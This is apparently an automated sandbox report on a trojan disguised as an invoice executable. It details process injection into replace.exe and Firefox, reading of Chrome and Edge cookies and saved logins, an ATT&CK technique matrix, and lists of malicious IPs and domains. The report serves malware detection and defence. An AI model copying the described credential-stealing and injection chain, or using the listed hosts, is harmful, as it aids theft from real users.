            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: NULL target: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe protection: read write
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\replace.exe Thread register set: target process: 2088
            Source: C:\Windows\SysWOW64\replace.exe Thread APC queued: target process: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process created: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process created: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
            Source: C:\Windows\SysWOW64\replace.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000000.1820646298.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2890099903.00000000017C0000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890200766.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000000.1820646298.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2890099903.00000000017C0000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890200766.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000000.1820646298.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2890099903.00000000017C0000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890200766.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000000.1820646298.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2890099903.00000000017C0000.00000002.00000001.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890200766.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeQueries volume information: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: C:\Windows\SysWOW64\replace.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\replace.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\replace.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\replace.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\replace.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\replace.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\replace.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\replace.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\replace.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            [Behavior graph. ID: 1427199, Sample: HYCO_Invoices MS2 & MS3.exe, Startdate: 17/04/2024, Architecture: WINDOWS, Score: 100]

            Source | Detection | Scanner | Label | Link
            HYCO_Invoices MS2 & MS3.exe | 47% | ReversingLabs | ByteCode-MSIL.Trojan.Swotter |
            HYCO_Invoices MS2 & MS3.exe | 41% | Virustotal | | Browse
            HYCO_Invoices MS2 & MS3.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            www.www60270.xyz | 2% | Virustotal | | Browse
            Source | Detection | Scanner | Label | Link
            https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe |
            https://cgqbbu1mvnevcxzh.app | 1% | Virustotal | | Browse
                                                                                                                          high
                                                                                                                          https://www.arsys.es/correo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correoreplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://klientams.iv.lt/replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://arsys.es/css/parking2.cssreplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.arsys.es/hosting/revendedores?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=rereplace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.iv.lt/sertifikatai/replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
91.195.240.117 | www.avoshield.com | Germany | 47846 | SEDO-ASDE | true
79.98.25.1 | www.maxiwalls.com | Lithuania | 62282 | RACKRAYUABRakrejusLT | true
217.76.128.34 | www.colchondealquiler.com | Spain | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
178.211.137.59 | www.skibinscy-finanse.pl | Ukraine | 31214 | TIS-DIALOG-ASRU | true
64.190.62.22 | www.paydayloans3.shop | United States | 11696 | NBS11696US | true
52.175.38.24 | fix01.pfw.djamxtvyk.cloudland3.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1427199
Start date and time: 2024-04-17 08:37:49 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: HYCO_Invoices MS2 & MS3.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/2@7/6
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 87%
• Number of executed functions: 65
• Number of non-executed functions: 269
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
Time | Type | Description
08:38:34 | API Interceptor | 1x Sleep call for process: HYCO_Invoices MS2 & MS3.exe modified
08:39:38 | API Interceptor | 2189389x Sleep call for process: replace.exe modified
                                                                                                                                      https://r20.rs6.net/tn.jsp?f=001aWvo3AAHeKpzw4Mz_sgYedpUawImPJsIps10Y8KYyNgYNz9veso7-cqLq8Ea4Kz4hKxMhfMBFtf-ffFtVC0q7ivGR36wf1VR8lyGBPIGdyfvSdYQA-i_Ls0DZQM2OGfs5QV_OFuzyeVR1SlSz9DgdpNGEtqd-Xjg&c=&ch=#Y2xpZW50c2VydmljZXNAYmFycm93aGFubGV5LmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                      • 178.211.133.68
                                                                                                                                      LhzvaAYMk3.elfGet hashmaliciousMiraiBrowse
                                                                                                                                      • 185.234.121.164
                                                                                                                                      Ship'_particular_pdf.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                      • 178.211.133.50
                                                                                                                                      MT_PAPA-AGENCY_APPOINTMENT_AND_PDA_QUERY_pdf.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                      • 178.211.133.50
                                                                                                                                      r20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                      • 178.211.133.50
                                                                                                                                      #U00d6DEME_FATURASI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                      • 178.211.133.50
                                                                                                                                      skid.x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                      • 31.192.150.227
                                                                                                                                      uTsXcPpJK6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                      • 213.149.20.213
                                                                                                                                      NBS11696UShiqWVuoNwf.elfGet hashmaliciousMiraiBrowse
                                                                                                                                      • 209.87.95.135
                                                                                                                                      narud#U017ebenicu 0BH2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 64.190.62.22
                                                                                                                                      http://altruisticcost.comGet hashmaliciousUnknownBrowse
                                                                                                                                      • 64.190.63.136
                                                                                                                                      n3R8WBIjhz.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 64.190.62.22
                                                                                                                                      8C3H9zQgK2.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 64.190.62.22
                                                                                                                                      240330_unpackedGet hashmaliciousUnknownBrowse
                                                                                                                                      • 64.190.63.222
                                                                                                                                      mrPTE618YB.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                      • 64.190.63.222
                                                                                                                                      1LZvA2cEfV.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • 64.190.62.22
                                                                                                                                      XJBYhQFCGi.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 64.190.62.22
                                                                                                                                      aMVimXl3J6.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 64.190.62.22
                                                                                                                                      SEDO-ASDEArrival Notice.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 91.195.240.19
                                                                                                                                      RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 91.195.240.117
                                                                                                                                      NEW-ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 91.195.240.19
                                                                                                                                      VAT PO 24000042.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 91.195.240.123
                                                                                                                                      202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 91.195.240.19
                                                                                                                                      SecuriteInfo.com.Trojan.Packed2.46654.20750.14267.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 91.195.240.123
                                                                                                                                      Ordin de plat#U0103.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 91.195.240.123
                                                                                                                                      PO# ROSIT#U00a0MR2309040.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 91.195.240.19
                                                                                                                                      alhadani Aprilorders140424.scr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 91.195.240.19
                                                                                                                                      Arrival Notice.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 91.195.240.19
                                                                                                                                      ONEANDONE-ASBrauerstrasse48DES#U0130PAR#U0130S_0433.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 217.160.0.183
                                                                                                                                      16042024124528724.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 217.160.0.183
                                                                                                                                      160420241245287.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 217.160.0.183
                                                                                                                                      16042024124521.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 217.160.0.183
                                                                                                                                      2024164846750.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 217.160.0.183
                                                                                                                                      S#U0130PAR#U0130S_0453.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 217.160.0.183
                                                                                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 217.160.0.46
                                                                                                                                      2024041342836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 217.160.0.183
                                                                                                                                      202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 217.160.0.183
                                                                                                                                      zamowienie_002523.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 217.160.0.183
                                                                                                                                      No context
                                                                                                                                      No context
                                                                                                                                      Process:C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1216
                                                                                                                                      Entropy (8bit):5.34331486778365
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                      Process:C:\Windows\SysWOW64\replace.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):114688
